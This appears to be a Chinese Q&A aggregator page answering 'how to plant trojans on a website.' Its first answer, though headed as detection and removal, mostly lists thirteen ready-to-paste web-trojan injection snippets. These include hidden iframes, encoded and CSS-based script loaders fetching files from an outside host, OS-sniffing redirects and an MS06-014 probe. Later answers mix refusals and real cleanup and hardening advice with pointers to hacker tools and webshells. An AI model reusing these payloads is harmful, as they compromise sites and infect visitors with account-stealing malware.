當前位置:首頁 » 網站資訊 » 如何給網站掛馬
擴展閱讀
星易付pos機連接不上網路 2025-01-13 19:56:36
手機關掉網路信號不好怎麼辦 2025-01-13 19:55:22
怎麼刪除mac的wifi連接網路設置 2025-01-13 19:54:28

如何給網站掛馬

發布時間: 2022-01-31 07:34:35

『壹』 如何進行網站掛馬檢測與清除

掛馬是常見的對網站和客戶都影響巨大的危害之一。如果是在訪問出來的源文件的頭上,或是最後有被加代碼,這個一般是網站文件被要改了,或是ARP,如果是源文件的很多數據位置(中間),那一般是資料庫被人掛了。伺服器上首先要安裝防病毒軟體,而且要保持在線病毒庫的更新,本人推薦使用eset nod32殺毒軟體,效果不錯,監測查殺木馬很及時,一般如果伺服器上的網頁里被掛馬了,一般都會檢測出來。
不完全統計,90%的網站都被掛過馬,掛馬是指在獲取網站或者網站伺服器的部分或者全部許可權後,在網頁文件中插入一段惡意代碼,這些惡意代碼主要是一些包括IE等漏洞利用代碼,用戶訪問被掛馬的頁面時,如果系統沒有更新惡意代碼中利用的漏洞補丁,則會執行惡意代碼程序,進行盜號等危險超過。目前掛馬主要是為了商業利益,有的掛馬是為了賺取流量,有的是為了盜取游戲等賬號,也有的是為了好玩,不管是處於那種目的,對於訪問被掛馬的網站來說都是一種潛在的威脅,影響運營網站公司形象。
一:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
三:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.softxp.net/muma.txt></script>
muma.txt可改成任意後綴
四:body掛馬
<body onload="window.location='地址';"></body>
五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe
src="http://www.softxp.net/muma.htm/"></iframe>';
六:css中掛馬
body {
background-image: url('javascript:document.write("<script
src=http://www.softxp.net/muma.js></script>")')}
七:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>
八:圖片偽裝
<html>
<iframe src="網馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>
九:偽裝調用:
<frameset rows="444,0" cols="*">
<frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高級欺騙
<a href="http://www.softbar.com(迷惑連接地址,顯示這個地址指向木馬地址)" onMouseOver="www_softbar_com();
return true;"> 頁面要顯示的內容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網馬地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizabl
e=no,history=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
十一:判斷系統代碼
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>
十二:判斷是否有ms06014代碼
<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=http://www.softxp.net width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=http://www.softxp.net width=100% height=100% scrolling=no frameborder=0>")
end if
</script>
十三:智能讀取js的代碼demo
//讀娶src的對象
var v = document.getElementById("advjs");
//讀娶src的參數
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("<iframe src=\"http://www.softxp.net/1/"+u_num+".htm\" width=\"0\" height=\"0\"
frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'http:\/\/www.softxp.net\/demo.js\')\"><\/DIV><\/DIV><
\/BODY><\/HTML>")
//分析src的參數函數
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; i<loallPm.length; i++){
var loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;
}

『貳』 如何在網站上掛馬

很簡單
因為你的電腦安裝了補丁
木馬無法被下載下來
現在的木馬生成器都不管什麼用了
再加上IE防漏牆
一般的網馬都沒用了
建議你不要干這些
做人要厚道

『叄』 網站掛馬怎麼

一般都是網站程序存在漏洞或者伺服器存在漏洞而被攻擊了
網站掛馬是每個網站最頭痛的問題,解決辦法:1.在程序中很容易找到掛馬的代碼,直接刪除,或則將你沒有傳伺服器的源程序覆蓋一次但反反復復被掛就得深入解決掉此問題了。但這不是最好的解決辦法。最好的方法還是找專業做安全的來幫你解決掉
聽朋友說
Sine安全
不錯
你可以去看看。
清馬+修補漏洞=徹底解決
清馬
1、找掛馬的標簽,比如有<script
language="javascript"
src="網馬地址"></script>或<iframe
width=420
height=330
frameborder=0
scrolling=auto
src=網馬地址></iframe>,或者是你用360或病殺毒軟體攔截了網馬網址。SQL資料庫被掛馬,一般是JS掛馬。
2、找到了惡意代碼後,接下來就是清馬,如果是網頁被掛馬,可以用手動清,也可以用批量清,網頁清馬比較簡單,這里就不詳細講,現在著重講一下SQL資料庫清馬,用這一句語句「update
表名
set
欄位名=replace(欄位名,'aaa','')」,
解釋一下這一句子的意思:把欄位名里的內容包含aaa的替換成空,這樣子就可以一個表一個表的批量刪除網馬。
在你的網站程序或資料庫沒有備份情況下,可以實行以上兩步驟進行清馬,如果你的網站程序有備份的話,直接覆蓋原來的文件即可。
修補漏洞(修補網站漏洞也就是做一下網站安全。)
1、修改網站後台的用戶名和密碼及後台的默認路徑。
2、更改資料庫名,如果是ACCESS資料庫,那文件的擴展名最好不要用mdb,改成ASP的,文件名也可以多幾個特殊符號。
3、接著檢查一下網站有沒有注入漏洞或跨站漏洞,如果有的話就相當打上防注入或防跨站補丁。
4、檢查一下網站的上傳文件,常見了有欺騙上傳漏洞,就對相應的代碼進行過濾。
5、盡可能不要暴露網站的後台地址,以免被社會工程學猜解出管理用戶和密碼。
6、寫入一些防掛馬代碼,讓框架代碼等掛馬無效。
7、禁用FSO許可權也是一種比較絕的方法。
8、修改網站部分文件夾的讀寫許可權。
9、如果你是自己的伺服器,那就不僅要對你的網站程序做一下安全了,而且要對你的伺服器做一下安全也是很有必要了!

『肆』 如何給別人的網站掛馬

前提是你會入侵嗎?

『伍』 怎麼在自己的網站掛馬

網馬 要免殺好 好的網馬要錢的 免費得那種生成的 中馬率很低很低的 不是補丁打好了 就是 被殺軟攔截了

而且掛馬網站要流量大~~~~~~

『陸』 如何在自己的網站上掛馬

用後台以上傳附件的形式上傳木馬 但前提你你有足夠大的許可權

『柒』 如何給自己的網站掛馬

去黑客網站自己去下吧
http://www.114la.com/Heike_Anquan/index.htm
有很多教程和軟體工具

『捌』 求助!怎麼給網站掛馬 下載網站程序

有合同嗎? 看看合同怎麼寫的
如果是付費的,用戶對於網站有絕對的版權, 而且空間屬於付費購買,他們只有中間商, 無權不告訴你。

『玖』 如何在自己網站上掛馬

樓主想害訪問你網站的用戶?不厚道啊。

成都優創網路,專注於網路安全評估、網站安全檢測、安全應急響應。

『拾』 如何給網站掛馬

拿webshell 就可以了

閱讀全文

與如何給網站掛馬相關的內容

本站內容整理源於互聯網,如有問題請聯系解決。
Copyright design: www.mobile2day.com since 2022